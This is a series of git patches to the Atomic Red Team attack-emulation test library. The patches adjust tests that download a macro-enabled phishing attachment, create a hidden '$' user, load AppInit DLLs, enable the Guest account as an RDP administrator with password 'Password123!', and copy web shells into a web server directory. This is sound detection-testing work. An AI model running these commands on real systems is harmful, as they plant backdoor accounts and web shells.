50/84] T1566.001-1 download bugfixes (#1522) * T1566.001-1 download bugfixes * comment update Co-authored-by: Carrie Roberts --- atomics/T1566.001/T1566.001.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index 1936e8b1..de1a135a 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -6,6 +6,7 @@ atomic_tests: description: | The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. + File is downloaded to the %temp% folder. supported_platforms: - windows executor: @@ -14,13 +15,13 @@ atomic_tests: return 'Please install Microsoft Excel before running this test.' } else{ - $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' + $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' $fileName = 'PhishingAttachment.xlsm' New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - ($wc.DownloadString("$url")) | Out-File $fileName + Invoke-WebRequest -Uri $url -OutFile $fileName } name: powershell - name: Word spawned a command shell and used an IP address in the command line From 532f4dc8828eb9c38b54fed10d8a6aab65b3702a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 20:28:57 +0000 Subject: [PATCH 51/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 5 +++-- atomics/T1566.001/T1566.001.md | 5 +++-- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 55705447..d83f2365 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -68098,6 +68098,7 @@ initial-access: description: | The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. + File is downloaded to the %temp% folder. supported_platforms: - windows executor: @@ -68106,13 +68107,13 @@ initial-access: return 'Please install Microsoft Excel before running this test.' } else{ - $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' + $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' $fileName = 'PhishingAttachment.xlsm' New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - ($wc.DownloadString("$url")) | Out-File $fileName + Invoke-WebRequest -Uri $url -OutFile $fileName } name: powershell - name: Word spawned a command shell and used an IP address in the command line diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index a29d97dd..08745edd 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -16,6 +16,7 @@ There are many options for the attachment such as Microsoft Office documents, ex ## Atomic Test #1 - Download Phishing Attachment - VBScript The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. +File is downloaded to the %temp% folder. **Supported Platforms:** Windows @@ -31,13 +32,13 @@ if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){ return 'Please install Microsoft Excel before running this test.' } else{ - $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' + $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm' $fileName = 'PhishingAttachment.xlsm' New-Item -Type File -Force -Path $fileName | out-null $wc = New-Object System.Net.WebClient $wc.Encoding = [System.Text.Encoding]::UTF8 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - ($wc.DownloadString("$url")) | Out-File $fileName + Invoke-WebRequest -Uri $url -OutFile $fileName } ``` From 388f671d9301961ed795d1e9995eb02a126999dc Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Wed, 16 Jun 2021 15:38:19 -0600 Subject: [PATCH 52/84] name update (#1521) Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1564/T1564.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 135e5897..2a20881f 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -39,7 +39,7 @@ atomic_tests: cleanup_command: | Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore name: powershell -- name: Create a user called "$" as noted here +- name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 description: Creating a user with a username containing "$" supported_platforms: From 7e428d79d08b0410d38626e4160770cdbc5031e6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 21:38:51 +0000 Subject: [PATCH 53/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 2 +- atomics/Indexes/Indexes-Markdown/windows-index.md | 2 +- atomics/Indexes/index.yaml | 2 +- atomics/T1564/T1564.md | 4 ++-- 6 files changed, 7 insertions(+), 7 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index b3f87204..b071737c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -326,7 +326,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell -defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt +defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f7877e90..8faf5fae 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -217,7 +217,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell -defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt +defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c79dc4ab..376d32e7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -579,7 +579,7 @@ - Atomic Test #1: Hidden Window [windows] - [T1564 Hide Artifacts](../../T1564/T1564.md) - Atomic Test #1: Extract binary files via VBA [windows] - - Atomic Test #2: Create a user called "$" as noted here [windows] + - Atomic Test #2: Create a Hidden User Called "$" [windows] - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5441311e..66cd7ded 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -410,7 +410,7 @@ - Atomic Test #1: Hidden Window [windows] - [T1564 Hide Artifacts](../../T1564/T1564.md) - Atomic Test #1: Extract binary files via VBA [windows] - - Atomic Test #2: Create a user called "$" as noted here [windows] + - Atomic Test #2: Create a Hidden User Called "$" [windows] - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d83f2365..8b99c367 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -25291,7 +25291,7 @@ defense-evasion: ' name: powershell - - name: Create a user called "$" as noted here + - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 description: Creating a user with a username containing "$" supported_platforms: diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index c2d9c76d..333370c2 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -8,7 +8,7 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio - [Atomic Test #1 - Extract binary files via VBA](#atomic-test-1---extract-binary-files-via-vba) -- [Atomic Test #2 - Create a user called "$" as noted here](#atomic-test-2---create-a-user-called--as-noted-here) +- [Atomic Test #2 - Create a Hidden User Called "$"](#atomic-test-2---create-a-hidden-user-called-) - [Atomic Test #3 - Create an "Administrator " user (with a space on the end)](#atomic-test-3---create-an-administrator--user-with-a-space-on-the-end) @@ -73,7 +73,7 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir

-## Atomic Test #2 - Create a user called "$" as noted here +## Atomic Test #2 - Create a Hidden User Called "$" Creating a user with a username containing "$" **Supported Platforms:** Windows From 358d58bad52900d2c0c39a195f13b32ac9b6976e Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 17 Jun 2021 07:07:56 -0600 Subject: [PATCH 54/84] add note about secure boot (#1524) --- atomics/T1546.010/T1546.010.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index acaa9658..f5e70f99 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml @@ -7,7 +7,9 @@ atomic_tests: AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the - AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up + AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. + + Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls supported_platforms: - windows input_arguments: From e7e57790256be024aef4c6920312c53ff2ec42ec Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Jun 2021 13:08:27 +0000 Subject: [PATCH 55/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 6 ++++-- atomics/T1546.010/T1546.010.md | 4 +++- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8b99c367..ecf12813 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -9349,7 +9349,8 @@ privilege-escalation: computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the \nAppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" + commands afterwards so you don't keep getting message boxes showing up.\n\nNote: + If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n" supported_platforms: - windows input_arguments: @@ -37163,7 +37164,8 @@ persistence: computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the \nAppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" + commands afterwards so you don't keep getting message boxes showing up.\n\nNote: + If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n" supported_platforms: - windows input_arguments: diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index d0d2cd8b..6a34b973 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -17,7 +17,9 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the -AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up +AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. + +Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls **Supported Platforms:** Windows From 7a17072dd36200e14c6471ebb0d159b0eb54b6aa Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 17 Jun 2021 07:10:51 -0600 Subject: [PATCH 56/84] don't disable rdp during cleanup by default (#1523) Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1078.001/T1078.001.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml index 3bc650f3..fef6894e 100644 --- a/atomics/T1078.001/T1078.001.yaml +++ b/atomics/T1078.001/T1078.001.yaml @@ -3,7 +3,9 @@ display_name: 'Valid Accounts: Default Accounts' atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -15,6 +17,10 @@ atomic_tests: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes @@ -27,7 +33,8 @@ atomic_tests: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true From a0e012ee099d5d354399e17246acbedb63b80a7a Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Jun 2021 13:11:19 +0000 Subject: [PATCH 57/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 60 ++++++++++++++++++++++------------ atomics/T1078.001/T1078.001.md | 9 +++-- 2 files changed, 46 insertions(+), 23 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ecf12813..075a05dd 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -11430,9 +11430,9 @@ privilege-escalation: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -11444,6 +11444,10 @@ privilege-escalation: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes @@ -11456,8 +11460,9 @@ privilege-escalation: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1078.002: @@ -21649,9 +21654,9 @@ defense-evasion: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -21663,6 +21668,10 @@ defense-evasion: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes @@ -21675,8 +21684,9 @@ defense-evasion: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1578.003: @@ -39427,9 +39437,9 @@ persistence: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -39441,6 +39451,10 @@ persistence: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes @@ -39453,8 +39467,9 @@ persistence: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1136.002: @@ -67406,9 +67421,9 @@ initial-access: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -67420,6 +67435,10 @@ initial-access: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes @@ -67432,8 +67451,9 @@ initial-access: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1078.002: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index c2c4a3b6..4ed80952 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,7 +12,8 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges -After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections +After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, +and desktop will allow multiple RDP connections. **Supported Platforms:** Windows @@ -24,6 +25,7 @@ After execution the Default Guest account will be enabled (Active) and added to |------|-------------|------|---------------| | guest_user | Specify the guest account | String | guest| | guest_password | Specify the guest password | String | Password123!| +| remove_rdp_access_during_cleanup | Set to 1 if you want the cleanup to remove RDP access to machine | Integer | 0| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -43,8 +45,9 @@ reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConne net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 -reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 -reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 +if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) +if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) +if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) ``` From 5b6f89f30fae51483d0861238cc3501d6f126cd5 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Tue, 22 Jun 2021 09:46:01 -0600 Subject: [PATCH 58/84] safer cleanup, correct filename (#1526) --- atomics/T1505.003/T1505.003.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/atomics/T1505.003/T1505.003.yaml b/atomics/T1505.003/T1505.003.yaml index bc9476b0..066dafd1 100644 --- a/atomics/T1505.003/T1505.003.yaml +++ b/atomics/T1505.003/T1505.003.yaml @@ -27,12 +27,14 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: command: | - xcopy #{web_shells} #{web_shell_path} + xcopy /I /Y #{web_shells} #{web_shell_path} cleanup_command: | - del #{web_shell_path} /q >nul 2>&1 + del #{web_shell_path}\b.jsp /q >nul 2>&1 + del #{web_shell_path}\tests.jsp /q >nul 2>&1 + del #{web_shell_path}\cmd.aspx /q >nul 2>&1 name: command_prompt From 722cc9a29233bfcb614a0989316471c4e8272d6c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 22 Jun 2021 15:46:20 +0000 Subject: [PATCH 59/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 11 ++++++----- atomics/T1505.003/T1505.003.md | 8 +++++--- 2 files changed, 11 insertions(+), 8 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 075a05dd..cf4dc78e 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -46120,15 +46120,16 @@ persistence: get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: - command: 'xcopy #{web_shells} #{web_shell_path} - -' - cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 + command: 'xcopy /I /Y #{web_shells} #{web_shell_path} ' + cleanup_command: | + del #{web_shell_path}\b.jsp /q >nul 2>&1 + del #{web_shell_path}\tests.jsp /q >nul 2>&1 + del #{web_shell_path}\cmd.aspx /q >nul 